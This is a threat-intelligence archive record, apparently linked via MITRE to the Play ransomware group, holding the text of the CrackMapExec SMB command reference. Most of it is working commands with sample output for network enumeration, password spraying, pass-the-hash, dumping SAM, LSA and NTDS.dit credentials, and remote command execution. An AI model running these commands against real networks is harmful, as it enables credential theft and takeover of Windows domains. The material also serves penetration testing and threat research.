{
	"id": "6615aeb0-bc71-4b80-a549-2899064d7222",
	"created_at": "2026-04-06T01:29:49.397473Z",
	"updated_at": "2026-04-10T03:30:33.216456Z",
	"deleted_at": null,
	"sha1_hash": "afd7bef80b044eb7cd208bb20dbc3fd08466fc40",
	"title": "SMB Command Reference",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 97098,
	"plain_text": "SMB Command Reference\r\nBy byt3bl33d3r\r\nArchived: 2026-04-06 01:06:17 UTC\r\nSMB: Command Reference\r\nUpdated: 7/27/18\r\nCME Version: 4.0.1dev\r\nNotes about command reference:\r\nThe following use cases assume you have a Kali Linux host connected to an internal network.\r\nFor the examples it is also assumed hosts are within the 192.168.1.0/24 IP space. If CME isn't giving output of any kind, you probably have something wrong with the command.\r\nMapping/Enumeration\r\nMap network hosts\r\nReturns a list of live hosts\r\n#~ cme smb 192.168.1.0/24\r\nExpected Results:\r\nSMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A\r\nSMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B)\r\nSMB 192.168.1.110 445 DC2016A [*] Windows Server 2016 Standard Evaluation 14393 x64 (name\r\nSMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signin\r\nGenerate Relay List\r\nMaps the network of live hosts and saves a list of only the hosts that don't require SMB signing.\r\nList format is one IP per line\r\n#~ cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt\r\nExpected Results:\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 1 of 8\n\nSMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A\r\nSMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B)\r\nSMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name\r\nSMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signin\r\n...SNIP...\r\n#~ cat relaylistOutputFilename.txt\r\n192.168.1.111\r\n192.168.1.117\r\nEnumerate shares and access\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares\r\nEnumerate active sessions\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions\r\nEnumerate disks\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks\r\nEnumerate logged on users\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users\r\nEnumerate domain users\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users\r\nEnumerate users by bruteforcing RID\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute\r\nEnumerate domain groups\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups\r\nEnumerate local groups\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups\r\nObtain domain password policy\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol\r\nAuthentication + Checking Credentials (Domain)\r\nFailed logins result in a [-]\r\nSuccessful logins result in a [+] Domain\\Username:Password\r\nLocal admin access results in a (Pwn3d!) added after the login confirmation, shown below.\r\nSMB 192.168.1.101 445 HOSTNAME [+] DOMAIN\\Username:Password (Pwn3d!)\r\nThe following checks will attempt authentication to the entire /24, though a single target may also be used.\r\nUser/Password\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'\r\nUser/Hash\r\nAfter obtaining credentials such as\r\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::\r\nyou can use either the full hash or just the NT hash (second half)\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'\r\n#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'\r\n#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c\r\nNull Sessions\r\n#~ cme smb 192.168.1.0/24 -u '' -p ''\r\nIf multiple domains are in play you may need to specify the target domain using -d\r\nFor example, authenticating to the domain labnet.com:\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p \"PASSWORDHERE\" -d LABNET\r\nUsing Username/Password Lists\r\nYou can use multiple usernames or passwords by separating the names/passwords with a space.\r\n#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18\r\n#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3\r\nCME accepts txt files of usernames and passwords. One user/password per line. Watch out for account lockout!\r\n#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18\r\n#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt\r\n*Note*: By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Useful for spraying a single password against a large user list. Usage example:\r\n#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success\r\nAuthentication/Checking credentials (Local)\r\nAdding --local-auth to any of the authentication commands will attempt to log on locally.\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --l\r\nResults will display the hostname next to the user:password\r\nSMB 192.168.1.101 445 HOSTNAME [+] HOSTNAME\\Username:Password (Pwn3d!)\r\nObtaining Credentials\r\nThe following examples use a username and plaintext password, although user/hash combos work as well.\r\n*Requires Local Admin\r\n***Requires Domain Admin or Local Admin privileges on target Domain Controller\r\n*Dump SAM hashes using methods from secretsdump.py\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam\r\n*Dump LSA secrets using methods from secretsdump.py\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa\r\n***Dump the NTDS.dit from target DC using methods from secretsdump.py\r\n2 methods are available:\r\n(default) drsuapi - Uses the drsuapi RPC interface to create a handle, trigger replication, and combined with additional drsuapi calls to convert the resultant linked-l\r\nvss - Uses the Volume Shadow Copy Service\r\n#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds\r\n#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss\r\n***Dump the NTDS.dit password history from target DC using methods from secretsdump.py\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history\r\n***Show the pwdLastSet attribute for each NTDS.dit account\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet\r\nSpidering Shares\r\nOptions for spidering shares of remote systems.\r\n***Spider the C drive for files with txt in the name (finds both sometxtfile.html and somefile.txt)\r\nNotice the '$' character has to be escaped. (The example shown can be used as-is in a Kali Linux terminal.)\r\n#~ cme SMB \u003cIP\u003e -u USER -p PASSWORD --spider C\\$ --pattern txt\r\nCommand Execution\r\nOptions for executing commands on remote systems.\r\nExecution Methods\r\nCME has three different command execution methods:\r\nwmiexec executes commands via WMI\r\natexec executes commands by scheduling a task with Windows Task Scheduler\r\nsmbexec executes commands by creating and running a service\r\nBy default CME will fail over to a different execution method if one fails. It attempts to execute commands in the following order:\r\n1. wmiexec\r\n2. atexec\r\n3. smbexec\r\nIf you want to force CME to use only one execution method you can specify which one using the --exec-method flag.\r\nThe command execution method is denoted in the Executed Command output line.\r\nWMIEXEC example, note the 'Executed command via wmiexec' output line.\r\nroot@EvilRick:~# cme smb 10.10.33.121 -u Administrator -p AAdmin\\!23 -X '$PSVersionTable' --exec-method wmiexec\r\nSMB 10.10.33.121 445 DESKTOP1 [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:DESKT\r\nSMB 10.10.33.121 445 DESKTOP1 [+] PACIFIC\\Administrator:AAdmin!23 (Pwn3d!)\r\nSMB 10.10.33.121 445 DESKTOP1 [+] Executed command via wmiexec\r\nSMB 10.10.33.121 445 DESKTOP1 Name Value\r\nSMB 10.10.33.121 445 DESKTOP1 ---- -----\r\nSMB 10.10.33.121 445 DESKTOP1 CLRVersion 2.0.50727.8793\r\nSMB 10.10.33.121 445 DESKTOP1 BuildVersion 6.1.7601.17514\r\nSMB 10.10.33.121 445 DESKTOP1 PSVersion 2.0\r\nSMB 10.10.33.121 445 DESKTOP1 WSManStackVersion 2.0\r\nSMB 10.10.33.121 445 DESKTOP1 PSCompatibleVersions {1.0, 2.0}\r\nSMB 10.10.33.121 445 DESKTOP1 SerializationVersion 1.1.0.1\r\nSMB 10.10.33.121 445 DESKTOP1 PSRemotingProtocolVersion 2.1\r\nExecuting Commands\r\nCurrently Broken in bleeding edge.\r\nIn the following example, we try to execute whoami on the target using the -x flag:\r\n#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami\r\nSMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7B\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX [+] Executed command\r\nSMB 192.168.10.11 445 WIN7BOX lab\\administrator\r\nExecuting PowerShell Commands\r\nYou can also directly execute PowerShell commands using the -X flag:\r\n#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'\r\nSMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX [+] Executed command\r\nSMB 192.168.10.11 445 WIN7BOX Name Value\r\nSMB 192.168.10.11 445 WIN7BOX ---- -----\r\nSMB 192.168.10.11 445 WIN7BOX CLRVersion 2.0.50727.8793\r\nSMB 192.168.10.11 445 WIN7BOX BuildVersion 6.1.7601.17514\r\nSMB 192.168.10.11 445 WIN7BOX PSVersion 2.0\r\nSMB 192.168.10.11 445 WIN7BOX WSManStackVersion 2.0\r\nSMB 192.168.10.11 445 WIN7BOX PSCompatibleVersions {1.0, 2.0}\r\nSMB 192.168.10.11 445 WIN7BOX SerializationVersion 1.1.0.1\r\nSMB 192.168.10.11 445 WIN7BOX PSRemotingProtocolVersion 2.1\r\nPowerShell commands can be forced to run in a 32-bit process:\r\n#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '[System.Environment]::Is64BitProcess' --force-\r\nSMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX [+] Executed command\r\nSMB 192.168.10.11 445 WIN7BOX false\r\nOther switches include:\r\n--no-output Does not retrieve command results\r\nWMI Query Execution\r\nSee more about WMI queries and syntax here: https://docs.microsoft.com/en-us/windows/desktop/wmisdk/invoking-a-synchronous-query\r\nIssues the specified WMI query\r\nUser/Password\r\n#~ cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi \"SELECT * FROM Win32_logicalDisk WHERE DeviceID =\r\nSMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7B\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX Caption =\u003e C:\r\nSMB 192.168.10.11 445 WIN7BOX Description =\u003e Local Fixed Disk\r\nSMB 192.168.10.11 445 WIN7BOX InstallDate =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX Name =\u003e C:\r\nSMB 192.168.10.11 445 WIN7BOX Status =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX Availability =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX CreationClassName =\u003e Win32_LogicalDisk\r\nSMB 192.168.10.11 445 WIN7BOX ConfigManagerErrorCode =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX ConfigManagerUserConfig =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX DeviceID =\u003e C:\r\nTODO: 9/4/18\r\n-Spidering Shares needs updates for the different available flags.\r\n-PowerShell Scripts obfuscation switches: --obfs and --clear-obfscripts\r\n-SMB modules: Probably will create a separate section.\r\n-Figure out what/why change the wmi-namespace is about.\r\nWMI Namespace\r\nUser/Password\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi-namespace 'root\\\\cimv2'\r\nSource: https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference"
	],
	"report_names": [
		"SMB-Command-Reference"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438989,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/afd7bef80b044eb7cd208bb20dbc3fd08466fc40.pdf",
		"text": "https://archive.orkl.eu/afd7bef80b044eb7cd208bb20dbc3fd08466fc40.txt",
		"img": "https://archive.orkl.eu/afd7bef80b044eb7cd208bb20dbc3fd08466fc40.jpg"
	}
}